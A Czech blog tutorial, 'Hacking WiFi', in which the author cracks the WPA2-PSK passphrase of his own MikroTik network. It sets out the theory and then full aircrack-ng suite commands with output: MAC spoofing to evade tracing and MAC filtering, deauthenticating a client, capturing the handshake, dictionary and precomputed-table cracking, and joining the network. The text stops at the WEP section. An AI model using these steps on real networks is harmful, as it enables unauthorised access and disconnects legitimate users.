abclinuxu.cz AbcLinuxu.cz itbiz.cz ITBiz.cz HDmag.cz HDmag.cz abcprace.cz AbcPráce.cz
Inzerujte na AbcPráce.cz od 950 Kč
Rozšířené hledání
×
    dnes 18:00 | IT novinky

    DuckDuckGo AI Chat umožňuje "pokecat si" s GPT-3.5 Turbo od OpenAI nebo Claude 1.2 Instant od Anthropic. Bez vytváření účtu. Všechny chaty jsou soukromé. DuckDuckGo je neukládá ani nepoužívá k trénování modelů umělé inteligence.

    Ladislav Hagara | Komentářů: 0
    dnes 14:22 | IT novinky

    VASA-1, výzkumný projekt Microsoftu. Na vstupu stačí jediná fotka a zvukový záznam. Na výstupu je dokonalá mluvící nebo zpívající hlava. Prý si technologii nechá jenom pro sebe. Žádné demo, API nebo placená služba. Zatím.

    Ladislav Hagara | Komentářů: 2
    dnes 04:44 | Nová verze

    Nová čísla časopisů od nakladatelství Raspberry Pi: MagPi 140 (pdf) a HackSpace 77 (pdf).

    Ladislav Hagara | Komentářů: 0
    dnes 01:00 | Nová verze

    ESPHome, tj. open source systém umožňující nastavovat zařízení s čipy ESP (i dalšími) pomocí konfiguračních souborů a připojit je do domácí automatizace, například do Home Assistantu, byl vydán ve verzi 2024.4.0.

    Ladislav Hagara | Komentářů: 0
    včera 22:11 | IT novinky Ladislav Hagara | Komentářů: 0
    včera 20:55 | Nová verze

    Neziskové průmyslové konsorcium Khronos Group vydalo verzi 1.1 specifikace OpenXR (Wikipedie), tj. standardu specifikujícího přístup k platformám a zařízením pro XR, tj. platformám a zařízením pro AR (rozšířenou realitu) a VR (virtuální realitu). Do základu se z rozšíření dostalo XR_EXT_local_floor. Společnost Collabora implementuje novou verzi specifikace do platformy Monado, tj. open source implementace OpenXR.

    Ladislav Hagara | Komentářů: 2
    včera 17:22 | Nová verze

    Byla vydána nová verze 0.38.0 multimediálního přehrávače mpv (Wikipedie) vycházejícího z přehrávačů MPlayer a mplayer2. Přehled novinek, změn a oprav na GitHubu. Požadován je FFmpeg 4.4 nebo novější a také libplacebo 6.338.2 nebo novější.

    Ladislav Hagara | Komentářů: 13
    včera 17:11 | Nová verze

    ClamAV (Wikipedie), tj. multiplatformní antivirový engine s otevřeným zdrojovým kódem pro detekci trojských koní, virů, malwaru a dalších škodlivých hrozeb, byl vydán ve verzích 1.3.1, 1.2.3 a 1.0.6. Ve verzi 1.3.1 je mimo jiné řešena bezpečnostní chyba CVE-2024-20380.

    Ladislav Hagara | Komentářů: 2
    včera 12:11 | IT novinky

    Digitální a informační agentura (DIA) oznámila (PDF, X a Facebook), že mobilní aplikace Portál občana je ode dneška oficiálně venku.

    Ladislav Hagara | Komentářů: 10
    včera 05:11 | Komunita

    #HACKUJBRNO 2024, byly zveřejněny výsledky a výstupy hackathonu města Brna nad otevřenými městskými daty, který se konal 13. a 14. dubna 2024.

    Ladislav Hagara | Komentářů: 2
    KDE Plasma 6
     (68%)
     (10%)
     (2%)
     (20%)
    Celkem 564 hlasů
     Komentářů: 4, poslední 6.4. 15:51
    Rozcestník

    Hacking WiFi

    9.6.2012 18:39 | Přečteno: 29250× | Výběrový blog

    Konečně jsem našel trochu času a síly k dalšímu příspěvku. Tentokrát budu psát o něčem, co pro mě bylo vždy obestřeno tajemstvím a co mě zároveň přitahovalo: Hackování. V tomto zápisku se budu věnovat konkrétně hackování Wi-Fi sítí. V rámci možností se budu snažit vysvětlit jednotlivé kroky a postupy tak, aby čtenář pochopil jak to vlastně funguje a v případě laborování na základě informací obsažených v tomto zápisku měl představu o tom co dělá. Zkrátka, aby to nebylo jen tupé opisování příkazů. Předem se omlouvám za nepřesnosti a případné chyby - budu jen rád za konstruktivní kritiku. Jen dodám, že jsem hackoval vlastní síť.

    ÚVOD

    Zaměřil jsem se na sítě, se zabezpečením WPA/WPA2 s PSK autentizací a WEP s OPN autentizací a to proto, že jsou dnes zastoupeny nejvíce. Dále předpokládám, že čtenář má řekněme nějakou základní znalost IT a ví, co je např. MAC adresa nebo IP adresa. Hned tady na začátku uvedu, že hackování Wi-Fi sítí opravdu není tak jednoduché, jak to znáte z youtube, kde nějaký borec prostě napíše deset příkazů a je tam:) Vše je něčím PODMÍNĚNO!

    Ještě než se pustím do samotného popisu hacku Wi-Fi sítě, uvedu vybavení jež jsem použil pro hackování.


    AP: Mikrotik RB751G-2HnD
    MAC adresa: xx:xx:xx:xx:xx:F9


    PC1: Lenovo NB (hackovací PC)
    Wi-Fi síťová karta: Intel Corporation PRO/Wireless 5100 AGN
    CPU: Intel Core2Duo P8400 2,26GHz
    RAM: 4GB
    HDD: 500GB
    OS: Backtrack 5 R2
    Ovladač Wi-Fi síťové karty: iwlwifi (alias iwlagn)
    Programy: airmon-ng, airodump-ng, aireplay-ng, airolib-ng, aircrack-ng


    PC2: Toshiba NB
    Wi-Fi síťová karta: TP-LINK TL-WN510G
    CPU: Intel Celeron 2,6GHz
    RAM: 256MB
    HDD: 6GB
    OS: MS Windows XP SP3
    Ovladač Wi-Fi síťové karty: TP-LINK 11b/g Wireless Adapter (ar5211.sys)
    MAC adresa: xx:xx:xx:xx:xx:D0


    Zaměřil jsem se na sítě, se zabezpečením WPA/WPA2 s PSK autentizací a WEP s OPN autentizací a to proto, že jsou dnes zastoupeny nejvíce. Dále předpokládám, že čtenář má řekněme nějakou základní znalost IT a ví, co je např. MAC adresa nebo IP adresa. Hned tady na začátku uvedu, že hackování Wi-Fi sítí opravdu není tak jednoduché, jak to znáte z youtube, kde nějaký borec prostě napíše deset příkazů a je tam:) Vše je něčím PODMÍNĚNO!


    TEORIE OBECNĚ

    Teorie autentizace a asociace


    Wi-fi sítě zmíněné v tomto zápisku jsou standardu 802.11. Pokud se chce klient připojit musí se nejprve autentizovat a následně k danému AP asociovat. K tomu jsou využívány tzv. management rámce (uvedené níže).

    Management rámce


    Obrázek ilustrující autentizaci a asociaci:

    Popis použitých nástrojů

    Použité zkratky

    Typy zabezpečení wifi sítí


    WPA/WPA2

    WPA/WPA2 TEORIE

    Teorie útoku na sítě se zabezpečením WPA/WPA2 a PSK autentizací

    U hackování WPA/WPA2 s PSK autentizací jsem se zaměřil na útok pomocí slovníkové metody, což znamená, že pokud heslo není v použitém slovníku tak se do sítě prostě nedostaneme. Pokud má slovník třeba i několik gigabajtů, tak můžeme strávit týdny lámáním hesla a to i na výkonném PC a pokud heslo ve slovníku nebude, tak se nikam nedostaneme a budeme akorát naštvaní, že jsme promarnili čas. Proto abysme byli úspěšní, tak heslo musí být obsaženo ve slovníku. Další možnost by bylo použití brute-force útoku - pro ten však nemáme dostatečně výkonný počítač. Tak, pokud jsem vás ještě neodradil a jste rozhodnuti to přece jen zkusit, čtěte dál - budu se snažit vás nezklamat:)

    Použijeme jednu techniku s tím, že heslo crackneme jednou přímo ze slovníku ( bez převypočtené hash tabulky), a podruhé s předvypočtenou hash tabulkou.

    Nejprve se pokusím zjednodušeně vysvětlit rozdíl mezi útokem bez převypočtené hash tabulky (dále jen útok A) a útokem s pomocí hash tabulky (dále jen útok B), alespoň tak jak jsem ho pochopil. Základem obou typů útoku je získat handshake, protože v něm je uložen mimo jiné "hash(passphrase + essid)".

    U útoku A v posledním kroku pomocí programu aircrack uděláme "hash(passphrase_ze_slovniku + essid)" a porovnáme se zachycenými daty z handshaku. Postup se tedy skládá ze dvou kroků. Udělat "hash(passphrase_ze_slovniku + essid)" a porovnat s handshake. Tyto dva kroky opakujeme tak dlouho až je nalezena shoda (opět připomínán, heslo musí být ve slovníku). Výhoda této metody je, že je "zanedbatelně" jednodušší než metoda použitá u útoku B. Nevýhoda plyne už ze samotného principu útoku B(viz. níže).

    U útoku B si krok, ve kterém provádíme "hash(passphrase_ze_slovniku + essid)" uděláme předem a uložíme do databáze. Nakonec pomocí programu aircrack-ng jen porovnáváme položky z databáze a handshakem. Samotné porovnávání je nesrovnatelně rychlejší než provedení "hash(passphrase_ze_slovniku + essid)", řádově několik tisíckrát. Někdo může namítnout, že operace "hash(passphrase_ze_slovniku + essid)" musíme stejně udělat před samotným porovnáním a tím pádem bude doba strávená výpočty stejně dlouhá jako u útoku A. Ano, to je pravda. Ale zkusme se podívat na následující příklad jež vypovídají o výhodách útoku B.


    Příklad)

    Mějme síť s ESSID "mikrotik" a passphrase "hesloheslo" a předpokládejme, že passphrase máme v použitém slovníku.


    Útok A)
    Bude se skládat z cyklického provádění kroků:
    1. "hash(passphrase_ze_slovniku + essid)"
    2. porovnání výsledku "hash(passphrase_ze_slovniku + essid)" se zachyceným handshake
    A to tak dlouho dokud nezískáme správnou hodnotu "hash(passphrase_ze_slovniku + essid)", která se bude rovnat té ze zachyceneného handshake. Když se admin sítě s ESSID "mikrotik" rozhodne změnit passphrase(pro zjednodušení uvažujme, že passphrase bude v našem slovníku blízko pozice předešlé passphrase) pak nám nezbude než znova cyklicky provádět kroky:
    1. "hash(passphrase_z_slovniku + essid)"
    2. porovnání výsledku "hash(passphrase_ze_slovniku + essid)" s zachyceným handshake.
    Takže útok bude trvat zhruba stejně dloho jako předchozí (nová passphrase je ve slovníku blízko předchozí).

    Útok B)
    Bude se skládat z cyklického provádění kroku "hash(passphrase_z_slovniku + essid)" jehož výsledek uloží do databáze nazvané třeba "hashdb". Až bude DB "hashdb" hotová budou se jednotlivé položky DB "hashdb" porovnávat se zachyceným handshake. Máme tu tedy kroky:
    1. "hash(passphrase_z_slovniku + essid)"
    2. porovnání výsledku "hash(passphrase_z_slovniku + essid)"se zachyceným hanshake
    Stejně jako u útoku A. Doba na získání passphrase je tedy stejná. Kde je tedy ta výhoda útoku B? Admin sítě s ESSID "mikrotik" se rozhodne opět změnit passphrase. A tady se dostáváme k výhodě útoku B. Krok "hash(passphrase_z_slovniku + essid)" už nemusíme provádět - máme ho totiž uložený v DB "hashdb". V tomto případě budeme jen porovnávat se zachyceným handshake a tím pádem jsme schopni získat passphrase až několik tisíckrát rychleji. Další výhoda útoku B je v tom, že pokud někde narazíme na síť se stejným ESSID jaké máme předvypočítané v DB "hashdb", opět už provádíme jen operaci porovnávání.

    WPA/WPA2 PRAXE

    Dále budou uvedeny kroky k prolomení hesla do Wi-Fi sítě se zabezpečením WPA/WPA2, autentizací pomocí PSK a s použitím slovníkového útoku. Znovu opakuji: pokud není heslo v použitém slovníku, nebudeme schopni jej získat.

    U každého kroku je vždy popsáno co děláme, příslušný příkaz a jeho výstup.


    Útok na síť se zabezpečením WPA/WPA2 a PSK autentizací - Útok A

    1) Přepneme síťovou kartu do "monitor módu". Od této chvíle budeme pracovat s rozhraním mon0.
    root@bt:~# airmon-ng start wlan0
    Found 2 processes that could cause trouble.
    If airodump-ng, aireplay-ng or airtun-ng stops working after
    a short period of time, you may want to kill (some of) them!
    
    PID	Name
    1301	dhclient3
    1817	dhclient3
    Process with PID 1817 (dhclient3) is running on interface wlan0
    
    
    Interface	Chipset		Driver
    
    wlan0		Intel 5100	iwlagn - [phy0]
    				(monitor mode enabled on mon0)
    root@bt:~# airmon-ng
    Interface       Chipset         Driver
    
    wlan0           Intel 5100      iwlagn - [phy0]
    mon0            Intel 5100      iwlagn - [phy0]
    2) Změníme MAC adresu rozhraní mon0. Ztížíme pak naše případné vystopování. Některé sítě mají nastavený MAC filtering, takže si můžeme nastavit adresu stejnou jakou má legitimní klient v síti. Pokud budou mít dvě stanice stejnou MAC, tak se nedá říct jak na to router (AP) zareaguje - záleží na výrobci.
    root@bt:~# ip link set mon0 down
    root@bt:~# ip link set mon0 address 00:11:22:33:44:55
    root@bt:~# ip link set mon0 up
    3) Zapneme skenování sítí a uděláme si tak přehled o tom, které sítě jsou dostupné a zároveň získáme potřebné údaje pro útok. Ze zobrazených sítí jsem si vybral síť s ESSID "Mikrotik" (je to moje síť). Nebudu zde rozepisovat co znamená která položka z následujícího výpisu, to je pěkně popsáno na webu aircracku.
    root@bt:~# airodump-ng mon0
    
    CH 12 ][ Elapsed: 8 s ][ 2012-04-07 13:30
    
     BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
    
     xx:xx:xx:xx:xx:F9  -15     1240     1120    0   1  54e. WPA2 CCMP   PSK  mikrotik
     xx:xx:xx:xx:xx:xx  -56       18        2    0   5  54   WPA2 CCMP   PSK  xxxx
     xx:xx:xx:xx:xx:xx  -56       27        0    0   5  54   WEP  WEP         xxxx
    
     BSSID              STATION            PWR   Rate    Lost  Packets  Probes
    
     xx:xx:xx:xx:xx:xx  xx:xx:xx:xx:xx:xx  -58    0 - 1     31       12  xxxx
     xx:xx:xx:xx:xx:F9  xx:xx:xx:xx:xx:D0  -15   54e-54     57       14  mikrotik 
    4) V tomto kroku zachytíme 4way-handshake z něhož nakonec získáme passphrase nutnou pro přihlášení k AP. Z výpisu z předešlého kroku vidíme, že síť "Mikrotik" je na 1. kanálu a AP má BSSID xx:xx:xx:xx:xx:F9. Zachycený 4way-handshake uložíme do souboru mikrotik. Handshake můžeme získat 2 způsoby. První je, že budeme čekat, až se některá stanice přihlásí k AP, ale to bysme taky mohli čekat věčnost... Druhý je založen na tom, že budeme aktivní a nějakou stanici deautentizujeme pomocí programu aireplay-ng v kroku 5.
    root@bt:~#  airodump-ng -c 1 -w mikrotik --bssid xx:xx:xx:xx:xx:F9 mon0
    
    CH  1 ][ Elapsed: 24 s ][ 2012-05-20 12:53 ]                                        
                                                                                                                                                               
     BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID 
                                                                                                                                                               
     xx:xx:xx:xx:xx:F9   -7   0      233      278    0   1  54e. WPA2 CCMP   PSK  mikrotik 
                                                                                 
                                                                                  
     BSSID              STATION            PWR   Rate    Lost  Packets Probes 
                                                                                                                                                               
     xx:xx:xx:xx:xx:F9  xx:xx:xx:xx:xx:D0  -30    5e-54     12      380  mikrotik
    Po tom co v kroku 5) proběhne deautentizace můžeme v pravém horním rohu vidět "WPA handshake: xx:xx:xx:xx:xx:F9". V tu chvíli máme handshake odchycený a zachytávání můžeme zastavit viz. níže. Než se v pravém horním rohu WPA handshake objeví tak to může chvíli trvat - musíme zkrátka počkat až se stanice znova autentizuje. Následující výpis se tedy zobrazí až po tom co vykonáme krok 5).
    CH  1 ][ Elapsed: 24 s ][ 2012-05-20 12:53 ][ WPA handshake: xx:xx:xx:xx:xx:F9                                         
                                                                                                                                                               
     BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID 
                                                                                                                                                               
     xx:xx:xx:xx:xx:F9   -7   0      233      278    0   1  54e. WPA2 CCMP   PSK  mikrotik 
                                                                                                                                                  
     BSSID              STATION            PWR   Rate    Lost  Packets   Probes 
                                                                                                                                                               
     xx:xx:xx:xx:xx:F9  xx:xx:xx:xx:xx:D0  -30    5e-54     12      380  mikrotik
    5) V tomto kroku deautentizujeme stanici s MAC adresou xx:xx:xx:xx:xx:D0. Tím ji donutíme se znova autentizovat. Díky tomu proběhne mezi stanicí a AP 4way-handshake, který zachytíme. Parametr -e udává ESSID sítě a parametr -0 určuje, že stanice bude deautentizována. Pokud se nám v kroku 4 nezobrazí žádná "STATION" použijeme příkaz bez přepínače -c. Tedy jen: "aireplay-ng -0 1 -e Mikrotik mon0".
    root@bt:~# aireplay-ng -0 1 -e mikrotik -c xx:xx:xx:xx:xx:D0 mon0
    
    12:53:26  Waiting for beacon frame (ESSID: mikrotik) on channel 1
    Found BSSID "xx:xx:xx:xx:xx:F9" to given ESSID "mikrotik".
    12:53:27  Sending 64 directed DeAuth. STMAC: [xx:xx:xx:xx:xx:D0] [ 4|66 ACKs]
    6) Nyní máme vše co potřebujeme pro pokus o prolomení hesla. Čili, soubor se zachceným handshakem a slovník, který si stáhneme z netu (stačí trochu zagooglit). Na prolomení hesla použijeme program aircrack-ng, jemuž jako parametr předáme soubor se zachyceným handshakem a slovník. Ve výpisu pak vidíme kolik hesel bylo otestováno, jakou rychlostí a nakonec i samotné heslo: "KEY FOUND! [ hesloheslo ]". K rychlosti testování klíčů bych ještě dodal, že jsem zkoušel cracknout heslo na na stroji s dvěma jádry v CPU a rychlost crackování byla přímo úměrná počtu použitých jader.
    root@bt:~# aircrack-ng -w slovnik.txt cap_file_mikrotik-01.cap
    
    Opening mikrotik-01.cap
    Read 1050 packets.
    
       #  BSSID              ESSID                     Encryption
    
       1  xx:xx:xx:xx:xx:F9  mikrotik                  WPA (1 handshake)
    
    Choosing first network as target.
    
    Opening cap_file_mikrotik-01.cap
    Reading packets, please wait...
    
    
     Aircrack-ng 1.1 r1899
    
    
                       [00:00:15] 18980 keys tested (1252.39 k/s)
    
    
                              KEY FOUND! [ hesloheslo ]
    
    
          Master Key     : 16 8F 40 94 70 27 EF 56 24 55 B5 2A D6 9F 9E B5 
                           88 D4 35 67 02 12 53 06 0B EB EF F1 EB CB C2 9A 
    
          Transient Key  : 2F 36 34 3D 21 E2 46 A1 B6 61 C8 02 EA 17 12 35 
                           B1 F4 81 C1 AE B8 EA 85 7F EB 3C 4B 0E E8 B9 42 
                           62 A1 33 5F 6F FD A3 EC 86 17 1A 4F FB 44 AA 73 
                           2C 57 4B 22 EF B3 B6 B1 C5 15 D6 21 6B FE 47 AC 
    
          EAPOL HMAC     : 13 9A 2F AD 41 62 DC 1A AE 84 8E 00 9C 60 B5 9C 
    7) Poslední krok je připojení se do samotné sítě. Budeme předpokládat, že v síti je DHCP server jež nám přidělí IP adresu. V tomto podkroku se nejprve do sítě autentizujeme/asociujeme. Pro autentizaci a asociaci použijeme příkazy wpa_passphrase a wpa_supplicant. Wpa_passphrase předáme dva parametry: essid a passphrase. Výstup přesměrujeme do souboru. Tím se nám vytvoří konfigurační soubor pro program wpa_supplicant. Pomocí programu wpa_supplicant se do sítě autentizujeme/asociujeme. Jako parametry předáváme kernel driver, ketrý je potřeba pro asociaci s AP, použitý interface a konfigurační soubor.
    root@bt:~# wpa_passphrase mikrotik "hesloheslo" > /etc/wpa_supplicant/wpa-psk.conf
    root@bt:~# wpa_supplicant -D wext -i wlan0 -c /etc/wpa_supplicant/wpa-psk.conf
    
    wpa_supplicant -D wext -i wlan0 -c /etc/wpa_supplicant/wpa-psk.conf ()
    WPS-AP-AVAILABLE 
    Trying to associate with xx:xx:xx:xx:xx:f9 (SSID='mikrotik' freq=2412 MHz)
    Authentication with xx:xx:xx:xx:xx:f9 timed out.
    WPS-AP-AVAILABLE 
    Trying to associate with xx:xx:xx:xx:xx:f9 (SSID='mikrotik' freq=2412 MHz)
    Associated with xx:xx:xx:xx:xx:f9
    WPA: Key negotiation completed with xx:xx:xx:xx:xx:f9 [PTK=CCMP GTK=CCMP]
    CTRL-EVENT-CONNECTED - Connection to xx:xx:xx:xx:xx:f9 completed (auth) [id=0 id_str=]
    
    
    cat /etc/wpa_supplicant/wpa-psk.conf
    
    network={
    	ssid="mikrotik"
    	#psk="hesloheslo"
    	psk=168f40947027ef562455b52ad69f9eb588d43567021253060bebeff1ebcbc29a
    }
    
    iwconfig wlan0
    
    wlan0     IEEE 802.11abgn  ESSID:"mikrotik"  
              Mode:Managed  Frequency:2.412 GHz  Access Point: xx:xx:xx:xx:xx:F9   
              Bit Rate=1 Mb/s   Tx-Power=15 dBm   
              Retry  long limit:7   RTS thr:off   Fragment thr:off
              Encryption key:off
              Power Management:off
              Link Quality=70/70  Signal level=-19 dBm  
              Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
              Tx excessive retries:0  Invalid misc:20   Missed beacon:0
    Nyní jsme asociovaní se sítí, takže nám zbývá nakonfigurovat síťové rozhraní, což provedeme pomocí DHCP serveru a klienta. Konkrétně použijeme program dhclient. Jako parametr mu předáváme síťové rozhraní jež chceme použít.
    root@bt:~# dhclient wlan0
    
    Internet Systems Consortium DHCP Client V3.1.3
    Copyright 2004-2009 Internet Systems Consortium.
    All rights reserved.
    For info, please visit https://www.isc.org/software/dhcp/
    
    mon0: unknown hardware address type 803
    mon0: unknown hardware address type 803
    Listening on LPF/wlan0/00:11:22:33:44:55
    Sending on   LPF/wlan0/00:11:22:33:44:55
    Sending on   Socket/fallback
    DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 8
    DHCPOFFER of 192.168.88.251 from 192.168.1.2
    DHCPREQUEST of 192.168.88.251 on wlan0 to 255.255.255.255 port 67
    DHCPACK of 192.168.88.251 from 192.168.1.2
    bound to 192.168.88.251 -- renewal in 126626 seconds.
    Pokud jsme byli ve všech výše zmíněných krocích úspěsní, můžeme začít síť používat. Pokud byl na routeru zapnutý MAC filtering tak nebylo možné se do sítě dostat. Výstup pokusu o připojení viz. níže.
    wpa_supplicant -D wext -i wlan0 -c /etc/wpa_supplicant/wpa-psk.conf
    
    WPS-AP-AVAILABLE 
    Trying to associate with xx:xx:xx:xx:xx:f9 (SSID='mikrotik' freq=2412 MHz)
    Authentication with xx:xx:xx:xx:xx:f9 timed out.
    WPS-AP-AVAILABLE 
    Trying to associate with xx:xx:xx:xx:xx:f9 (SSID='mikrotik' freq=2412 MHz)
    Authentication with xx:xx:xx:xx:xx:f9 timed out.
    WPS-AP-AVAILABLE 
    Trying to associate with xx:xx:xx:xx:xx:f9 (SSID='mikrotik' freq=2412 MHz)
    Authentication with xx:xx:xx:xx:xx:f9 timed out.
    WPS-AP-AVAILABLE 
    Trying to associate with xx:xx:xx:xx:xx:f9 (SSID='mikrotik' freq=2412 MHz)
    Authentication with xx:xx:xx:xx:xx:f9 timed out.
    
    root@bt:~# iwconfig wlan0
    
    wlan0     IEEE 802.11abgn  ESSID:"mikrotik"  
              Mode:Managed  Frequency:2.412 GHz  Access Point: Not-Associated   
              Tx-Power=15 dBm   
              Retry  long limit:7   RTS thr:off   Fragment thr:off
              Encryption key:off
              Power Management:off
    V případě, že jsem nechal MAC filtering zapnutý a nastavil jsem na PC1 MAC adresu PC2 (v síti tedy budou připojeny 2 PC se stejnou MAC) nebylo možné se s PC1 do sítě připojit (viz. níže) a to i v případě, že mělo silnější signál.
    root@bt:~# ip link set wlan0 down
    root@bt:~# ip link set wlan0 address xx:xx:xx:xx:xx:D0
    root@bt:~# ip link set wlan0 up
    
    
    root@bt:~# wpa_supplicant -D wext -i wlan0 -c /etc/wpa_supplicant/wpa-psk.conf
    
    ioctl[SIOCGIWSCAN]: Resource temporarily unavailable
    WPS-AP-AVAILABLE 
    Trying to associate with xx:xx:xx:xx:xx:f9 (SSID='mikrotik' freq=2412 MHz)
    Associated with xx:xx:xx:xx:xx:f9
    WPA: Key negotiation completed with xx:xx:xx:xx:xx:f9 [PTK=CCMP GTK=CCMP]
    CTRL-EVENT-CONNECTED - Connection to xx:xx:xx:xx:xx:f9 completed (auth) [id=0 id_str=]
    WPA: EAPOL-Key Replay Counter did not increase - dropping packet
    WPA: EAPOL-Key Replay Counter did not increase - dropping packet
    WPA: EAPOL-Key Replay Counter did not increase - dropping packet
    
    
    root@bt:~# iwconfig wlan0
    
    wlan0     IEEE 802.11abgn  ESSID:"mikrotik"  
              Mode:Managed  Frequency:2.412 GHz  Access Point: xx:xx:xx:xx:xx:f9   
              Bit Rate=13.5 Mb/s   Tx-Power=15 dBm   
              Retry  long limit:7   RTS thr:off   Fragment thr:off
              Encryption key:off
              Power Management:off
              Link Quality=70/70  Signal level=-22 dBm  
              Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
              Tx excessive retries:0  Invalid misc:16   Missed beacon:0
    
    
    root@bt:~# dhclient wlan0
    
    Internet Systems Consortium DHCP Client V3.1.3
    Copyright 2004-2009 Internet Systems Consortium.
    All rights reserved.
    For info, please visit https://www.isc.org/software/dhcp/
    
    Listening on LPF/wlan0/xx:xx:xx:xx:xx:D0
    Sending on   LPF/wlan0/xx:xx:xx:xx:xx:D0
    Sending on   Socket/fallback
    DHCPREQUEST of 192.168.88.251 on wlan0 to 255.255.255.255 port 67
    DHCPREQUEST of 192.168.88.251 on wlan0 to 255.255.255.255 port 67
    DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 6
    DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 13
    DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 16
    DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 11
    DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 15
    No DHCPOFFERS received.
    Trying recorded lease 192.168.88.251
    bound: renewal in 126966 seconds.
    V případě, že jsem PC2 odpojil tak se s PC1(má MAC adresu PC2) bez problémů připojím.
    root@bt:~# wpa_supplicant -D wext -i wlan0 -c /etc/wpa_supplicant/wpa-psk.conf
    
    Trying to associate with xx:xx:xx:xx:xx:f9 (SSID='mikrotik' freq=2412 MHz)
    WPS-AP-AVAILABLE 
    Associated with xx:xx:xx:xx:xx:f9
    WPA: Key negotiation completed with xx:xx:xx:xx:xx:f9 [PTK=CCMP GTK=CCMP]
    CTRL-EVENT-CONNECTED - Connection to xx:xx:xx:xx:xx:f9 completed (auth) [id=0 id_str=]
    
    
    root@bt:~# dhclient wlan0
    
    There is already a pid file /var/run/dhclient.pid with pid 2055
    killed old client process, removed PID file
    Internet Systems Consortium DHCP Client V3.1.3
    Copyright 2004-2009 Internet Systems Consortium.
    All rights reserved.
    For info, please visit https://www.isc.org/software/dhcp/
    
    mon0: unknown hardware address type 803
    mon0: unknown hardware address type 803
    Listening on LPF/wlan0/xx:xx:xx:xx:xx:D0
    Sending on   LPF/wlan0/xx:xx:xx:xx:xx:D0
    Sending on   Socket/fallback
    DHCPREQUEST of 192.168.88.251 on wlan0 to 255.255.255.255 port 67
    DHCPNAK from 192.168.1.2
    DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 8
    DHCPOFFER of 192.168.88.252 from 192.168.1.2
    DHCPREQUEST of 192.168.88.252 on wlan0 to 255.255.255.255 port 67
    DHCPACK of 192.168.88.252 from 192.168.1.2
    bound to 192.168.88.252 -- renewal in 100518 seconds.
    
    
    Útok na síť se zabezpečením WPA/WPA2 a PSK autentizací a s použitím předvypočtené hash tabulky - Útok B

    Kroky 1-5 jsou stejné jako u útoku A.

    6) Jak už bylo popsáno v teoretické části, u tohoto typu útoku vytvoříme DB s "hash(passphrase_ze_slovniku + essid)". DB vytvoříme pomocí programu airolib-ng jemuž předáme jako parametr cestu k slovníku s hesly (password_file.txt), cestu k souboru se jmény sítí (essid.txt) a jméno DB (crackwpa). Tady ještě dodám, že sítí může být více. V DB pak bude množina kombinací "každá síť s každou passphrase_z_slovniku". Ve výpisu příkazu je řádek "Writing...s read, 734 invalid lines ignored.". Program airoloib-ng vynechává hesla, která není možné u WPA/WPA2 použít (možné je použít jen 8-63 znaků).
    root@bt:~# airolib-ng crackwpa --import passwd password_file.txt
    
    Database (crackwpa) does not already exist, creating it...
    Database (crackwpa) successfully created
    Reading file...
    Writing...s read, 734 invalid lines ignored.
    Done.
    
    root@bt:~/airolib# airolib-ng crackwpa --import essid essid.txt
    
    Reading file...
    Writing...
    Done.
    7) V tomto kroku je DB "čištěna" od neplatných ESSID, je prováděn test integrity DB, redukuje se velikost DB atd. Výstup programu vypovídá o právě prováděných akcích.
    root@bt:~/airolib# airolib-ng crackwpa --clean all
    
    Deleting invalid ESSIDs and passwords...
    Deleting unreferenced PMKs...
    Analysing index structure...
    Vacuum-cleaning the database. This could take a while...
    Checking database integrity...
    integrity_check
    ok
    Done.
    8) Dále si můžeme vypsat statistiky naší DB.
    root@bt:~/airolib# airolib-ng crackwpa --stats
    
    There are 1 ESSIDs and 78398 passwords in the database. 0 out of 78398 possible combinations have been computed (0%).
    
    ESSID	Priority	Done
    Mikrotik	64	0.0
    
    9) V tomto kroku jsou vytvořeny kombinace ESSID s hesly obsaženými ve našem slovníku "hash(passphrase_ze_slovniku + essid)". Tento krok trvá nejdéle.
    root@bt:~/airolib# airolib-ng crackwpa --batch
    
    Computed 78398 PMK in 393 seconds (199 PMK/s, 0 in buffer). All ESSID processed.
    10) V tomto kroku se ověřuje množina výsledných klíčů s tím, že nevalidní jsou z DB smazány.
    root@bt:~/airolib# airolib-ng crackwpa --verify all
    
    Checking all PMKs. This could take a while...
    ESSID	PASSWORD	PMK_DB	CORRECT
    11) Následuje poslední krok útoku B. Programu aircrack-ng je předána námi vytvořená DB (crackwpa) a soubor se zahcyceným handshakem. Všiměte si rychlosti testování jednotlivých klíčů a porovnejte s předchozím typem útoku.
    root@bt:~/airolib# aircrack-ng -r crackwpa mikrotik-01.cap
    
    Opening mikrotik-01.cap
    Read 1863 packets.
    
       #  BSSID              ESSID                     Encryption
    
       1  00:02:72:5D:70:35  Mikrotik                      WPA (1 handshake)
    
    Choosing first network as target.
    
    Opening mikrotik-01.cap
    Reading packets, please wait...
    
                                     Aircrack-ng 1.1 r1899
    
    
                       [00:00:00] 7822 keys tested (65705.14 k/s)
    
    
                              KEY FOUND! [ hesloheslo ]
    
    
          Master Key     : 30 FE 92 BA 01 5F 50 16 3C 3B 76 95 AC 57 BE 49 
                           76 A7 E4 E7 F1 36 CD 39 AF 86 CD 1D 02 E7 DB 65 
    
          Transient Key  : 98 0F C0 C4 B7 C5 AE 5D 01 AA 1A 30 BA A5 11 02 
                           E5 BA A1 97 04 A5 07 3F D5 6F D3 F3 88 F6 10 CF 
                           E0 3A B2 EF A5 CF ED CD 00 5D 9B 8A 56 30 F2 49 
                           39 4C 80 80 81 7B 2F AD CB B9 06 9D D5 E8 0E 9B 
    
          EAPOL HMAC     : 67 7A FD EE FC CE 19 20 39 0E C3 8B 29 25 82 45 
    
    
    Quitting aircrack-ng...

    WEP

    WEP TEORIE

    Teorie útoku na síť se zabezpečením WEP a OPN autentizací


